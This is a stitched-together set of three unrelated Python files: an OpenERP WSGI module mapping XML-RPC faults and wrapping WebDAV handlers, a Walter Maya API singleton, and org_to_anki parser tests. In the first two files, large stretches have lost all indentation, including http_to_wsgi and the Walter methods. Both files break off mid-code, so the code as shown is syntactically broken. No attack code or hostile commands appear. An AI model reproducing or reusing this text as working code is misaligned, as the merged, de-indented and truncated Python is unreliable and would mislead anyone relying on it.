# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
"""
WSGI stack, common code.
"""
import httplib
import urllib
import xmlrpclib
import StringIO
import errno
import logging
import os
import signal
import sys
import threading
import traceback
import werkzeug.serving
import werkzeug.contrib.fixers
import openerp
import openerp.modules
import openerp.tools.config as config
import websrv_lib
# Module-level logger for the WSGI stack.
_logger = logging.getLogger(__name__)
# XML-RPC fault codes. Some care must be taken when changing these: the
# constants are also defined client-side and must remain in sync.
# User code must use the exceptions defined in ``openerp.exceptions`` (not
# create directly ``xmlrpclib.Fault`` objects).
RPC_FAULT_CODE_CLIENT_ERROR = 1 # indistinguishable from app. error.
RPC_FAULT_CODE_APPLICATION_ERROR = 1  # deliberately shares value 1 (see note above)
RPC_FAULT_CODE_WARNING = 2
RPC_FAULT_CODE_ACCESS_DENIED = 3
RPC_FAULT_CODE_ACCESS_ERROR = 4
# The new (6.1) versioned RPC paths.
# NOTE(review): the '/1' variants presumably pin protocol version 1 --
# confirm at the dispatch sites.
XML_RPC_PATH = '/openerp/xmlrpc'
XML_RPC_PATH_1 = '/openerp/xmlrpc/1'
JSON_RPC_PATH = '/openerp/jsonrpc'
JSON_RPC_PATH_1 = '/openerp/jsonrpc/1'
def xmlrpc_return(start_response, service, method, params, legacy_exceptions=False):
    """
    Helper to call a service's method with some params, using a wsgi-supplied
    ``start_response`` callback.

    This is the place to look at to see the mapping between core exceptions
    and XML-RPC fault codes.

    :param start_response: WSGI ``start_response`` callable.
    :param str service: name of the netsvc service to dispatch to (e.g.
        ``db``, ``common``, ``object``).
    :param str method: name of the method invoked on that service.
    :param tuple params: positional parameters decoded from the request body.
    :param bool legacy_exceptions: when True, serialize errors with the
        pre-6.1 string fault codes instead of the numeric ones.
    :return: a one-element list holding the marshalled XML-RPC response body.
    """
    # Map OpenERP core exceptions to XML-RPC fault codes. Specific exceptions
    # defined in ``openerp.exceptions`` are mapped to specific fault codes;
    # all the other exceptions are mapped to the generic
    # RPC_FAULT_CODE_APPLICATION_ERROR value.
    # This also mimics SimpleXMLRPCDispatcher._marshaled_dispatch() for
    # exception handling.
    try:
        result = openerp.netsvc.dispatch_rpc(service, method, params)
        response = xmlrpclib.dumps((result,), methodresponse=1, allow_none=False, encoding=None)
    except Exception, e:
        if legacy_exceptions:
            response = xmlrpc_handle_exception_legacy(e)
        else:
            response = xmlrpc_handle_exception(e)
    # Faults also travel with a 200 status: XML-RPC errors live in the
    # payload, not in the HTTP status line.
    start_response("200 OK", [('Content-Type','text/xml'), ('Content-Length', str(len(response)))])
    return [response]
def xmlrpc_handle_exception(e):
    """Serialize an exception as an XML-RPC fault (new-style numeric codes).

    :param e: the exception caught while dispatching an RPC call.
    :return: the fault marshalled with ``xmlrpclib.dumps``.
    """
    if isinstance(e, openerp.osv.osv.except_osv): # legacy
        fault = xmlrpclib.Fault(RPC_FAULT_CODE_WARNING, openerp.tools.ustr(e.value))
    elif isinstance(e, openerp.exceptions.Warning):
        fault = xmlrpclib.Fault(RPC_FAULT_CODE_WARNING, str(e))
    elif isinstance(e, openerp.exceptions.AccessError):
        fault = xmlrpclib.Fault(RPC_FAULT_CODE_ACCESS_ERROR, str(e))
    elif isinstance(e, openerp.exceptions.AccessDenied):
        fault = xmlrpclib.Fault(RPC_FAULT_CODE_ACCESS_DENIED, str(e))
    elif isinstance(e, openerp.exceptions.DeferredException):
        # The traceback was captured when the exception was deferred.
        formatted_info = "".join(traceback.format_exception(*e.traceback))
        fault = xmlrpclib.Fault(RPC_FAULT_CODE_APPLICATION_ERROR, formatted_info)
    elif hasattr(e, 'message') and e.message == 'AccessDenied': # legacy
        fault = xmlrpclib.Fault(RPC_FAULT_CODE_ACCESS_DENIED, str(e))
    else:
        # Generic application error: ship the current traceback to the client.
        formatted_info = "".join(traceback.format_exception(*sys.exc_info()))
        fault = xmlrpclib.Fault(RPC_FAULT_CODE_APPLICATION_ERROR, formatted_info)
    # Consistency fix: the generic branch used to pass allow_none=None while
    # every other branch passed False. None is falsy so behavior is unchanged,
    # but the single unified dumps() call removes the inconsistency and the
    # six duplicated serialization lines.
    return xmlrpclib.dumps(fault, allow_none=False, encoding=None)
def xmlrpc_handle_exception_legacy(e):
    """Serialize an exception as an XML-RPC fault (pre-6.1 string codes).

    :param e: the exception caught while dispatching an RPC call.
    :return: the fault marshalled with ``xmlrpclib.dumps``.
    """
    if isinstance(e, openerp.osv.osv.except_osv):
        fault = xmlrpclib.Fault('warning -- ' + e.name + '\n\n' + e.value, '')
    elif isinstance(e, openerp.exceptions.Warning):
        fault = xmlrpclib.Fault('warning -- Warning\n\n' + str(e), '')
    elif isinstance(e, openerp.exceptions.AccessError):
        fault = xmlrpclib.Fault('warning -- AccessError\n\n' + str(e), '')
    elif isinstance(e, openerp.exceptions.AccessDenied):
        fault = xmlrpclib.Fault('AccessDenied', str(e))
    elif isinstance(e, openerp.exceptions.DeferredException):
        # The traceback was captured when the exception was deferred.
        formatted_info = "".join(traceback.format_exception(*e.traceback))
        fault = xmlrpclib.Fault(openerp.tools.ustr(e.message), formatted_info)
    else:
        formatted_info = "".join(traceback.format_exception(*sys.exc_info()))
        fault = xmlrpclib.Fault(openerp.tools.exception_to_unicode(e), formatted_info)
    # Consistency fix: the generic branch used to pass allow_none=None while
    # every other branch passed False (same runtime effect, None is falsy).
    return xmlrpclib.dumps(fault, allow_none=False, encoding=None)
def wsgi_xmlrpc_1(environ, start_response):
    """The main OpenERP WSGI handler, serving the versioned /openerp/xmlrpc/1 path.

    Hard-coded routes: ``<service>``, ``<service>/<db>``, or
    ``model/<db>/<model>``. Any other POST on this path is answered with a
    client-error fault. Returns None (letting the next WSGI handler run)
    when the request does not target this path.
    """
    if environ['REQUEST_METHOD'] == 'POST' and environ['PATH_INFO'].startswith(XML_RPC_PATH_1):
        length = int(environ['CONTENT_LENGTH'])
        data = environ['wsgi.input'].read(length)
        params, method = xmlrpclib.loads(data)
        path = environ['PATH_INFO'][len(XML_RPC_PATH_1):]
        if path.startswith('/'): path = path[1:]
        if path.endswith('/'): path = path[:-1]
        path = path.split('/')
        # All routes are hard-coded.
        # No need for a db segment.
        if len(path) == 1:
            service = path[0]
            if service == 'common':
                if method in ('server_version',):
                    service = 'db'
            return xmlrpc_return(start_response, service, method, params)
        # A db segment must be given.
        elif len(path) == 2:
            service, db_name = path
            params = (db_name,) + params
            return xmlrpc_return(start_response, service, method, params)
        # A db segment and a model segment must be given.
        elif len(path) == 3 and path[0] == 'model':
            service, db_name, model_name = path
            # The model name is spliced in after the first two params
            # (presumably uid/password — TODO confirm against dispatch_rpc).
            params = (db_name,) + params[:2] + (model_name,) + params[2:]
            service = 'object'
            return xmlrpc_return(start_response, service, method, params)
        # The body has been read, need to raise an exception (not return None).
        fault = xmlrpclib.Fault(RPC_FAULT_CODE_CLIENT_ERROR, '')
        # Consistency fix: allow_none=None -> allow_none=False (same effect,
        # matches every other dumps() call in this file).
        response = xmlrpclib.dumps(fault, allow_none=False, encoding=None)
        start_response("200 OK", [('Content-Type','text/xml'), ('Content-Length', str(len(response)))])
        return [response]
def wsgi_xmlrpc(environ, start_response):
    """WSGI handler answering the unversioned /openerp/xmlrpc path.

    Only the bare ``version`` method is served here; any other POST on this
    path gets a client-error fault. Returns None when the request does not
    target this path (so the next handler can run).
    """
    if environ['REQUEST_METHOD'] == 'POST' and environ['PATH_INFO'].startswith(XML_RPC_PATH):
        length = int(environ['CONTENT_LENGTH'])
        data = environ['wsgi.input'].read(length)
        params, method = xmlrpclib.loads(data)
        path = environ['PATH_INFO'][len(XML_RPC_PATH):]
        if path.startswith('/'): path = path[1:]
        if path.endswith('/'): path = path[:-1]
        path = path.split('/')
        # All routes are hard-coded.
        if len(path) == 1 and path[0] == '' and method in ('version',):
            return xmlrpc_return(start_response, 'common', method, ())
        # The body has been read, need to raise an exception (not return None).
        fault = xmlrpclib.Fault(RPC_FAULT_CODE_CLIENT_ERROR, '')
        # Consistency fix: allow_none=None -> allow_none=False (same effect).
        response = xmlrpclib.dumps(fault, allow_none=False, encoding=None)
        start_response("200 OK", [('Content-Type','text/xml'), ('Content-Length', str(len(response)))])
        return [response]
def wsgi_xmlrpc_legacy(environ, start_response):
    """Serve the deprecated unversioned ``/xmlrpc/<service>`` endpoint.

    Returns None (so the next WSGI handler can try) for any request that is
    not a POST under /xmlrpc/.
    """
    if environ['REQUEST_METHOD'] != 'POST':
        return
    if not environ['PATH_INFO'].startswith('/xmlrpc/'):
        return
    length = int(environ['CONTENT_LENGTH'])
    payload = environ['wsgi.input'].read(length)
    # The remainder of the path names the service: db, object, ...
    service = environ['PATH_INFO'][len('/xmlrpc/'):]
    params, method = xmlrpclib.loads(payload)
    return xmlrpc_return(start_response, service, method, params, True)
def wsgi_webdav(environ, start_response):
    """Dispatch WebDAV requests to the legacy HTTP service handlers.

    Answers bare ``OPTIONS *`` / ``OPTIONS /`` probes directly; for /webdav
    paths it strips the matched service prefix from PATH_INFO and delegates
    to the wrapped handler via ``http_to_wsgi()``. Implicitly returns None
    when the request is not a WebDAV one, so the next handler can run.
    """
    pi = environ['PATH_INFO']
    if environ['REQUEST_METHOD'] == 'OPTIONS' and pi in ['*','/']:
        return return_options(environ, start_response)
    elif pi.startswith('/webdav'):
        http_dir = websrv_lib.find_http_service(pi)
        if http_dir:
            # Re-root PATH_INFO below the matched service directory.
            path = pi[len(http_dir.path):]
            if path.startswith('/'):
                environ['PATH_INFO'] = path
            else:
                environ['PATH_INFO'] = '/' + path
            return http_to_wsgi(http_dir)(environ, start_response)
def return_options(environ, start_response):
    """Answer an OPTIONS request advertising the supported DAV features.

    :param environ: WSGI environment (or pre-parsed header dict from the
        legacy handler path).
    :param start_response: WSGI ``start_response`` callable.
    :return: an empty body; all information travels in the headers.
    """
    # Microsoft specific header, see
    # http://www.ibm.com/developerworks/rational/library/2089.html
    # Bug fix: in a WSGI environ the User-Agent header is exposed as
    # 'HTTP_USER_AGENT' (PEP 3333), so the old lookup of 'User-Agent' never
    # matched. Keep the old key as a fallback for non-WSGI callers.
    user_agent = environ.get('HTTP_USER_AGENT', environ.get('User-Agent', ''))
    if 'Microsoft' in user_agent:
        options = [('MS-Author-Via', 'DAV')]
    else:
        options = []
    options += [('DAV', '1 2'), ('Allow', 'GET HEAD PROPFIND OPTIONS REPORT')]
    start_response("200 OK", [('Content-Length', str(0))] + options)
    return []
def http_to_wsgi(http_dir):
"""
Turn a BaseHTTPRequestHandler into a WSGI entry point.
Actually the argument is not a bare BaseHTTPRequestHandler but is wrapped
(as a class, so it needs to be instanciated) in a HTTPDir.
This code is adapted from wbsrv_lib.MultiHTTPHandler._handle_one_foreign().
It is a temporary solution: the HTTP sub-handlers (in particular the
document_webdav addon) have to be WSGIfied.
"""
def wsgi_handler(environ, start_response):
headers = {}
for key, value in environ.items():
if key.startswith('HTTP_'):
key = key[5:].replace('_', '-').title()
headers[key] = value
if key == 'CONTENT_LENGTH':
key = key.replace('_', '-').title()
headers[key] = value
if environ.get('Content-Type'):
headers['Content-Type'] = environ['Content-Type']
path = urllib.quote(environ.get('PATH_INFO', ''))
if environ.get('QUERY_STRING'):
path += '?' + environ['QUERY_STRING']
request_version = 'HTTP/1.1' # TODO
request_line = "%s %s %s\n" % (environ['REQUEST_METHOD'], path, request_version)
class Dummy(object):
pass
# Let's pretend we have a server to hand to the handler.
server = Dummy()
server.server_name = environ['SERVER_NAME']
server.server_port = int(environ['SERVER_PORT'])
# Initialize the underlying handler and associated auth. provider.
con = openerp.service.websrv_lib.noconnection(environ['wsgi.input'])
handler = http_dir.instanciate_handler(con, environ['REMOTE_ADDR'], server)
# Populate the handler as if it is called by a regular HTTP server
# and the request is already parsed.
handler.wfile = StringIO.StringIO()
handler.rfile = environ['wsgi.input']
handler.headers = headers
handler.command = environ['REQUEST_METHOD']
handler.path = path
handler.request_version = request_version
handler.close_connection = 1
handler.raw_requestline = request_line
handler.requestline = request_line
# Handle authentication if there is an auth. provider associated to
# the handler.
if hasattr(handler, 'auth_provider'):
try:
handler.auth_provider.checkRequest(handler, path)
except websrv_lib.AuthRequiredExc, ae:
# Darwin 9.x.x webdav clients will report "HTTP/1.0" to us, while they support (and need) the
# authorisation features of HTTP/1.1
if request_version != 'HTTP/1.1' and ('Darwin/9.' not in handler.headers.get('User-Agent', '')):
start_response("403 Forbidden", [])
return []
start_response("401 Authorization required", [
('WWW-Authenticate', '%s realm="%s"' % (ae.atype,ae.realm)),
# ('Connection', 'keep-alive'),
('Content-Type', 'text/html'),
('Content-Length', 4), # len(self.auth_required_msg)
])
return ['Blah'] # self.auth_required_msg
except websrv_lib.AuthRejectedExc,e:
start_response("403 %s" % (e.args[0],), [])
return []
method_name = 'do_' + handler.command
# Support the OPTIONS method even when not provided directly by the
# handler. TODO I would prefer to remove it and fix the handler if
# needed.
if not hasattr(handler, method_name):
if handler.command == 'OPTIONS':
return return_options(environ, start_response)
| |
"""API to control Walter."""
# Copyright 2017 <NAME>. All rights reserved.
# Override categories accepted by setOverride/detachOverride/overrides.
OVERRIDE_TRANSFORM = 'transform'        # transformation override
OVERRIDE_SHADER = 'shader'              # surface shader assignment
OVERRIDE_DISPLACEMENT = 'displacement'  # displacement shader assignment
OVERRIDE_ATTRIBUTE = 'attribute'        # walterOverride attribute node
class Walter(object):
    """
    This object represents the Walter API. The Walter Panel interacts with Maya
    (in future it will interact with other packages) using this object.
    Implemented as a singleton: ``__new__`` below always returns the same
    instance, which delegates all calls to an environment-specific
    implementation stored in ``self.details``.
    """
    # Keeps track of the single instance of the class
    __instance = None
def __new__(cls, *args, **kwargs):
"""
Create the instance if it hasn't been created already.
:returns: The new object instance.
"""
if not cls.__instance:
# Remember the instance so that no more are created.
instance = super(Walter, cls).__new__(cls, *args, **kwargs)
# Implementation details. We can switch them depending on
# the environment.
import walterPanel.walterMayaTraverser
instance.details = \
walterPanel.walterMayaTraverser.WalterMayaImplementation()
cls.__instance = instance
return cls.__instance
def origins(self):
"""
Return the list of all the origin items to display in the tree.
:returns: The list of all the origin items in the scene.
:rtype: list
"""
return self.details.origins()
def dir(self, origin, path):
"""
Return the list of child objects of the given path.
:Example:
.. code:: python
from pprint import pprint
from walter import Walter
objects = Walter().dir(
"walterStandinShape1", "/ships_greyjoy_shd_hi/mesh")
pprint(objects)
:Output:
.. code:: python
[u'/ships_greyjoy_shd_hi/mesh/M_defaultShip_GRP',
u'/ships_greyjoy_shd_hi/mesh/M_segmentsBreakA_GRP',
u'/ships_greyjoy_shd_hi/mesh/M_segmentsBreakB_GRP']
:param str origin: The stand-in object that contains the tree.
:param str path: The path to the sub-object.
:returns: The list of all the origin items in the scene.
:rtype: list
"""
return self.details.dir(origin, path)
def props(self, origin, path):
"""
Return the list of properties of the given path.
:Example:
.. code:: python
from pprint import pprint
from walter import Walter
properties = Walter().props(
"walterStandinShape1", "/ships_greyjoy_shd_hi/mesh")
pprint(properties)
:Output:
.. code:: python
[u'/ships_greyjoy_shd_hi/mesh/M_defaultShip_GRP',
u'/ships_greyjoy_shd_hi/mesh/M_segmentsBreakA_GRP',
u'/ships_greyjoy_shd_hi/mesh/M_segmentsBreakB_GRP']
:param str origin: The stand-in object that contains the tree.
:param str path: The path to the sub-object.
:returns: The list of all the properties of the object at the given path.
:rtype: list
"""
return self.details.props(origin, path)
def setOverride(self, origin, layer, path, material, overrideType):
"""
Save the material/displacement from the Maya nodes. It's looking for the
connections of the Walter Stand-in object and creates/replaces the
connection to the material.
:Example:
.. code:: python
from walter import Walter
from walter import OVERRIDE_SHADER
# Assign lambert1 to the root of walterStandinShape1
Walter().setOverride(
"walterStandinShape1",
"defaultRenderLayer",
"/",
"lambert1",
OVERRIDE_SHADER)
:param str origin: The stand-in object.
:param str layer: Render layer to save the material.
:param str path: The full Alembic path of the sub-object.
:param str material: The material/displacement/walterOverride object.
:param str overrideType:
OVERRIDE_ATTRIBUTE or OVERRIDE_DISPLACEMENT or OVERRIDE_SHADER
"""
return self.details.setOverride(
origin, layer, path, material, overrideType)
def detachOverride(self, origin, layer, path, overrideType, overrideName):
"""
Detach override from the path. It clears the connections of the given
Alembic path.
:Example:
.. code:: python
from walter import Walter
from walter import OVERRIDE_SHADER
# Detach shader from the root of walterStandinShape1
Walter().detachOverride(
"walterStandinShape1",
"defaultRenderLayer",
"/",
OVERRIDE_SHADER)
:param str origin: The stand-in object.
:param str layer: Render layer to save the material.
:param str path: The full Alembic path of the sub-object.
:param str overrideType:
OVERRIDE_ATTRIBUTE or OVERRIDE_DISPLACEMENT or OVERRIDE_SHADER
"""
return self.details.detachOverride(origin, layer, path,
overrideType, overrideName)
def overrides(self, origin, layer, overrideType):
"""
Return override assignment structure for given origin.
:param str origin: The stand-in object.
:param str layer: Render layer to save the material.
:param str overrideType:
OVERRIDE_ATTRIBUTE or OVERRIDE_DISPLACEMENT or OVERRIDE_SHADER
:returns:
The assignment structure. Looks like this:
{'aiStandard1': ['/pSphere1/pTorus1'], "aiStandard2": ['/', '/box']}
:rtype: dict
"""
return self.details.overrides(origin, layer, overrideType)
def action(self, obj):
"""
Perform some action with the given object. It happens when the user
clicks the button on the Alembic object of the tree view. Usually, it's
select.
:param str obj: The object to perform the action.
"""
return self.details.action(obj)
def layers(self, origin):
"""
Return all the layers of the origin item.
:param str origin: The stand-in object.
:returns: All the render layers of the stand-in object.
:rtype: list
"""
return self.details.layers(origin)
def currentLayer(self):
"""
Return the currently editable layer.
:returns: The current render layer.
:rtype: str
"""
return self.details.currentLayer()
def produceOverrides(self, object):
"""
Check what overrides it's possible to get from this object.
:Example:
.. code:: python
print Walter().produceOverrides("lambert1")
print Walter().produceOverrides("walterOverride1")
print Walter().produceOverrides("initialShadingGroup")
:Output:
.. code:: python
[('lambert1', 'shader')]
[('walterOverride1', 'attribute')]
[(u'lambert1', 'shader'), (u'displacementShader2', 'displacement')]
:returns: A list with override objects and types.
:rtype: list
"""
return self.details.produceOverrides(object)
def overrideType(self, object):
"""
Deprecated. Use produceOverrides instead.
Check the type of the object and return which override we can use. For a
shader, it should return OVERRIDE_SHADER, for a displacement it should
return OVERRIDE_DISPLACEMENT.
:Example:
.. code:: python
print Walter().overrideType("lambert1")
print Walter().overrideType("walterOverride1")
:Output:
.. code:: python
shader
attribute
:returns: The override type.
:rtype: str
"""
return self.details.overrideType(object)
def rename(self, origin, oldName, newName):
"""
Rename expression in all the render layers.
:Example:
.. code:: python
from walter import Walter
from walter import OVERRIDE_SHADER
# Create an expresion and assign lambert1 to it
Walter().setOverride(
"walterStandinShape1",
"defaultRenderLayer",
"/*",
"lambert1",
OVERRIDE_SHADER)
# Rename the expression
Walter().rename("walterStandinShape1", "/*", "/*/*")
:param str origin: The stand-in object.
:param str oldName: The given expression.
:param str newName: The new expression.
"""
return self.details.rename(origin, oldName, newName)
def remove(self, origin, path):
"""
Remove the expression in all the render layers.
:Example:
.. code:: python
from walter import Walter
# Remove the expression
Walter().remove("walterStandinShape1", "/*/*")
:param str origin: The stand-in object.
:param str path: The given expression.
"""
return self.details.remove(origin, path)
def create(self, overrideType):
"""
Create an override object and return its name. For now, it works with
attributes only. It should create a walterOverride object.
:Example:
.. code:: python
from walter import Walter
from walter import OVERRIDE_ATTRIBUTE
# Create walterOverride
override = Walter().create(OVERRIDE_ATTRIBUTE)
# Create an expression and assign the override on it
Walter().setOverride(
"walterStandinShape1",
"defaultRenderLayer",
"/pShpere*",
override,
OVERRIDE_ATTRIBUTE)
:param str overrideType:
OVERRIDE_ATTRIBUTE or OVERRIDE_DISPLACEMENT or OVERRIDE_SHADER
:returns: The name of the new object.
:rtype: str
"""
return self.details.create(overrideType)
def saveAssignment(self, origin, fileName=None):
"""
Save the shader assignment to the external file. If the file is not
specified, show the dialog.
:param str origin: The stand-in object.
:param str fileName: The target Alembic file.
"""
return self.details.saveAssignment(origin, fileName)
def saveAttributes(self, origin, fileName=None):
"""
Save the walterOverride nodes to the external file. If the file is not
specified, show the dialog.
:param str origin: The stand-in object.
:param str fileName: The target Alembic file.
"""
return self.details.saveAttributes(origin, fileName)
def saveMaterials(self, origin, fileName=None):
"""
Save the materials to the external file. If the file is not specified,
show the dialog.
:param str origin: The stand-in object.
:param str fileName: The target Alembic file.
"""
return self.details.saveMaterials(origin, fileName)
def saveTransforms(self, origin, fileName=None):
"""
Save the transformation nodes to the external file. If the file is not
specified, show the dialog.
:param str origin: The stand-in object.
:param str fileName: The target file.
"""
return self.details.saveTransforms(origin, fileName)
def savePurposes(self, origin, fileName=None):
"""
Save the usd purposes to the external file. If the file is not
specified, show the dialog.
:param str origin: The stand-in object.
:param str fileName: The target file.
"""
return self.details.savePurposes(origin, fileName)
def saveVariantsLayer(self, origin, fileName=None):
"""
Save the usd variants layer to the external file. If the file is not
specified, show the dialog.
:param str origin: The stand-in object.
:param str fileName: The target file.
"""
return self.details.saveVariantsLayer(origin, fileName)
def setGroup(self, origin, path, group):
"""
Set the group of the given expression.
:param str origin: The stand-in object.
:param str path: The given expression.
:param str group: The given group.
"""
return self.details.setGroup(origin, path, group)
def expressionGroups(self, origin):
"""
Get all available expression groups.
:param str origin: The stand-in object.
"""
return self.details.expressionGroups(origin)
def expressions(self, origin, group=None):
"""
Get all the expressions of the specified group.
:param str origin: The stand-in object.
:param str group: The given group.
"""
return self.details.expressions(origin, group)
def exposeTransforms(self, origin, alembicObject):
"""
Create the locations objects for the object and its parents in the maya
scene and connect them to the walter | |
# Make the package under ../src importable when the tests are run from the
# repository root (no install step required).
import sys
sys.path.append('../src/org_to_anki')
from org_to_anki.org_parser import parseData
from org_to_anki.ankiClasses.AnkiQuestion import AnkiQuestion
from org_to_anki.ankiClasses.AnkiDeck import AnkiDeck
from org_to_anki.org_parser.DeckBuilder import DeckBuilder
### Test basic deck is parsed and built correctly ###
def testBasicPraseNamedCorrectly():
    # The deck takes its name from the org file's base name.
    # NOTE(review): "Prase" is a typo for "Parse"; kept to preserve the
    # test's public name.
    filename = "tests/testData/basic.org"
    actualDeck = parseData.parse(filename)
    assert(actualDeck.deckName == "basic")
def testFileWithNoQuestions():
    # An org file with no headings parses to a deck with zero questions.
    filename = "tests/testData/empty.org"
    actualDeck = parseData.parse(filename)
    assert(len(actualDeck.getQuestions()) == 0)
def testBaiscPraseQuestsion():
    # First question and its ordered answers come straight from basic.org.
    # NOTE(review): the name has typos ("Baisc", "Questsion"); kept to
    # preserve the test's public name.
    filename = "tests/testData/basic.org"
    actualDeck = parseData.parse(filename)
    assert(actualDeck.getQuestions()[0].question[0] == "Put request")
    assert(actualDeck.getQuestions()[0].getAnswers() == ["Puts file / resource at specific url", "If file ==> exists => replaces // !exist => creates", "Request => idempotent"])
def testBasicParseMainDeckParameters():
    # Top-of-file '#' comments are kept verbatim and '# key = value' lines
    # are also exposed as deck parameters.
    filename = "tests/testData/basic.org"
    actualDeck = parseData.parse(filename)
    assert(actualDeck._comments == ['# Quick Anki notes', '# listType = bulletPoints'])
    assert(actualDeck._parameters == {'listType': 'bulletPoints'})
def testBasicParseQuestionsHaveParametersAndParameters():
    # A question carries its own comments/parameters and inherits the
    # deck-level ones.
    filename = "tests/testData/basic.org"
    actualDeck = parseData.parse(filename)
    params = {'other': 'test', 'listType': 'bulletPoints'} # listType is inherited from the parent deck
    comments = ['# other=test']
    assert(actualDeck.getQuestions()[0]._parameters == params)
    assert(actualDeck.getQuestions()[0]._comments == comments)
### Test basic deck parse with sublevels ###
def testBasicWithSublevelsAnswers():
    # Deeper org levels nest as sub-lists inside the answers structure.
    filename = "tests/testData/basicWithSublevels.org"
    actualDeck = parseData.parse(filename)
    answers = ['.jar => contains libraries / resources / accessories files', '.war => contain the web application => jsp / html / javascript / other files', ['Need for web apps', ["fourth 1", "fourth 2"], "back to third"]]
    assert(actualDeck.getQuestions()[0]._answers == answers)
def testFormatFile():
    # _formatFile returns the raw, cleaned lines of the org file.
    filename = "tests/testData/basic.org"
    data = parseData._formatFile(filename)
    assert(len(data) == 8)
def testSortData():
    # _sortData splits raw lines into comment lines ('#'-prefixed) and
    # content lines ('*'-prefixed); anything else is dropped.
    # NOTE(review): the original indentation inside this triple-quoted
    # literal may have been lost in formatting — the len(lines) == 8
    # assertion suggests the literal originally held one more line than is
    # visible here; confirm against version control.
    lines = """#Comment 1
# Indented comment 2
* line 1
# type=basic
** line 2
badlyformated line
""".split("\n")
    assert(len(lines) == 8)
    comments, content = DeckBuilder()._sortData(lines)
    assert(len(comments) == 2)
    assert(len(content) == 4)
### Test topics deck built correctly ###
def testTopicsDeckNamedCorrectly():
    # A topics-layout file still names the root deck after the file.
    filename = "tests/testData/topicsLayout.org"
    actualDeck = parseData.parse(filename)
    assert(actualDeck.deckName == "topicsLayout")
def testTopicsSubDecksNamedCorrectly():
    # Each top-level topic heading becomes a named sub-deck.
    filename = "tests/testData/topicsLayout.org"
    actualDeck = parseData.parse(filename)
    assert(actualDeck.subDecks[0].deckName == "Capital cites")
    assert(actualDeck.subDecks[1].deckName == "Languages of countries")
def testMainDeckHasComment():
    # File-level comments stay attached to the root deck, not the sub-decks.
    filename = "tests/testData/topicsLayout.org"
    actualDeck = parseData.parse(filename)
    comments = ['# More advanced org file layout. Each topics has its own questions.', '#fileType = topics']
    assert(actualDeck._comments == comments)
def testMainDeckHasParameters():
    # The '#fileType = topics' comment is parsed into a deck parameter.
    filename = "tests/testData/topicsLayout.org"
    actualDeck = parseData.parse(filename)
    params = {'fileType': 'topics'}
    assert(actualDeck._parameters == params)
def testSubDeck1QuestionHasParamters():
    # When the same parameter appears twice, the later value wins while
    # both comment lines are preserved.
    # NOTE(review): "Paramters" is a typo; kept to preserve the test's name.
    filename = "tests/testData/topicsLayout.org"
    actualDeck = parseData.parse(filename)
    params = {'type': 'Basic (and reversed card)'}
    comments = ["# type = basic","#type=Basic (and reversed card)"]
    assert(actualDeck.subDecks[1].getQuestions()[0]._parameters == params)
    assert(actualDeck.subDecks[1].getQuestions()[0]._comments == comments)
def testSubDeck0HasBasicQuestion():
    # The first sub-deck contains the expected capital-city question.
    # Fix: removed an unused AnkiQuestion (q1) that was constructed,
    # populated, and then never compared against anything.
    filename = "tests/testData/topicsLayout.org"
    actualDeck = parseData.parse(filename)
    assert(actualDeck.subDecks[0].getQuestions()[0].question[0] == "What is the capital of Ireland")
    assert(actualDeck.subDecks[0].getQuestions()[0]._answers == ["Dublin"])
def testSubDeck1HasBasicQuestion():
    # The second sub-deck's first question keeps its two ordered answers.
    filename = "tests/testData/topicsLayout.org"
    actualDeck = parseData.parse(filename)
    assert(actualDeck.subDecks[1].getQuestions()[0].question[0] == "What are the main languages in Ireland")
    assert(actualDeck.subDecks[1].getQuestions()[0]._answers == ["English", "Irish"])
def testEmptyLinesHandledCorrectly():
    # An empty line between the question and its answer must not break
    # parsing. Fix: the test previously built the deck and asserted
    # nothing, so it could only fail by raising.
    data = ["* Question line 1","","** Answer"]
    deckBuilder = DeckBuilder()
    deck = deckBuilder.buildDeck(data, "test Deck", "")
    assert(deck is not None)
    assert(len(deck.getQuestions()) == 1)
def testMultiLineQuestion():
    # Consecutive '*' lines merge into a single multi-line question.
    # Fix: removed an unused AnkiQuestion (q1) copy-pasted from another
    # test and a leftover debugging print().
    data = ["* Question line 1","* Question line 2","** Answer"]
    deckBuilder = DeckBuilder()
    deck = deckBuilder.buildDeck(data, "test Deck", "")
    expectedQuestion = AnkiQuestion()
    expectedQuestion.addQuestion("Question line 1")
    expectedQuestion.addQuestion("Question line 2")
    expectedQuestion.addAnswer("Answer")
    assert(deck.getQuestions()[0].question == expectedQuestion.question)
    assert(deck.getQuestions()[0]._answers == expectedQuestion._answers)
# Test flat topics layout
def testFlatTopics():
    # In the flat-topics layout the topic name is folded into each question
    # text ("topic\nquestion") instead of creating sub-decks.
    filename = "tests/testData/flatTopics.org"
    actualDeck = parseData.parse(filename)
    question1 = actualDeck.getQuestions()[0]
    assert(question1.getQuestions()[0] == "Capital cites\nWhat is the capital of Ireland")
    assert(question1.getAnswers()[0] == "Dublin")
    question2 = actualDeck.getQuestions()[1]
    assert(question2.getQuestions()[0] == "Capital cites\nWhat is the capital of Germany")
    assert(question2.getAnswers()[0] == "Berlin")
    question3 = actualDeck.getQuestions()[2]
    assert(question3.getQuestions()[0] == "Languages of countries\nWhat is the main languages in Ireland")
    assert(question3.getAnswers()[0] == "Irish")
    question4 = actualDeck.getQuestions()[3]
    assert(question4.getQuestions()[0] == "Languages of countries\nWhat is the main languages in Germany")
    assert(question4.getAnswers()[0] == "German")
def testOrganisedTopics():
    # The organisedFile layout flattens section headings away, keeping the
    # bare questions.
    filename = "tests/testData/organisedFile.org"
    actualDeck = parseData.parse(filename)
    question1 = actualDeck.getQuestions()[0]
    assert(question1.getQuestions()[0] == "First main rule of scalability?")
    assert(question1.getAnswers()[0] == "Each server behind load balancer")
    question2 = actualDeck.getQuestions()[1]
    assert(question2.getQuestions()[0] == "What is the main purpose of the factory pattern?")
    assert(question2.getAnswers()[0] == "Allow reference to objects via an interface")
def testOrganisedFlatTopics():
    # The organised flat layout prefixes each question with its section
    # title ("section\nquestion") and keeps multiple answers in order.
    filename = "tests/testData/organisedFlatFile.org"
    actualDeck = parseData.parse(filename)
    question1 = actualDeck.getQuestions()[0]
    assert(question1.getQuestions()[0] == "Systems design primer\nFirst main rule of scalability?")
    assert(question1.getAnswers()[0] == "Each server behind load balancer")
